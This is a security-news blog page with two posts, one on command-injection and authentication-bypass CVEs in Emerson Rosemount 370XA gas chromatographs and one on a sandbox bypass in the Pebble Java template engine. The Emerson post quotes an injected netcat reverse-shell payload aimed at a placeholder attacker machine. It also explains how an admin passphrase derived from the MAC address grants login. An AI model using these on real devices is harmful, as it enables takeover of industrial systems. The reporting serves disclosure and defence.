Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Command Injection. Show all posts

Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data

 

Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command implementation. This flaw is tied to a system function that calls a constructed shell command with a user-provided file name without proper sanitization, allowing an attacker to inject arbitrary shell commands.

An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.

The second vulnerability, CVE-2023-51761, is an authentication bypass that enables an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password. The passphrase, derived from the device's MAC address, can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.

Critical Security Bug Detected in Java Template Framework Pebble

 

The vulnerability in Pebble, a Java templating engine could allow a hacker to circumvent its security safeguards and launch command injection assaults against host servers.  

Pebble Templates is primarily used to generate HTML text output but it can also employ to design CSS, XML, JS, etc. The templates are convenient because of their user-friendly web application templating system, internationalization capabilities, and security features like auto-escaping and a block-list method access validator that thwarts command execution assaults. 

However, a threat analyst at GitHub has identified that with the right code and template files, Pebble’s command execution defense can be bypassed easily. 

Circumventing Pebble Security 

The bypassing technology can work effectively when Pebble is utilized in combination with Spring, a well-known Java application framework. Multiple Spring classes are registered as beans, allowing them to be dynamically installed at runtime. The hacker can install one of the Spring objects that supports class loading by exploiting the Java beans engine. 

Subsequently, the malicious hacker can employ Jackson, a data-parsing library, to read an XML file containing the details of a class to instantiate and a function to operate. This allows a threat actor a window to execute arbitrary code on the host server. 

As a proof of concept, the security analyst installed an XML file from the internet employing a Pebble template, then instantiated a Java class that supported implementing server-side system commands. 

No easy solution yet 

The security bug report has sparked conversation among GitHub researchers. Due to the vulnerability’s CVE designation, business systems that rely on the latest version of Pebble are receiving security alerts.

The maintainers are working on a fix, but since it is a community-driven project, it remains unclear when it will be published. The developers have issued a few temporary workarounds to safeguard projects in the interim. 

It is worth noting that to exploit the bug, an attacker would need to have a way to upload a malicious Pebble template on the server. Hence, organizations must enhance security checks on user-provided content and limit template uploads. Businesses can also employ sanitization techniques to spot and mitigate malicious content before using it in the template.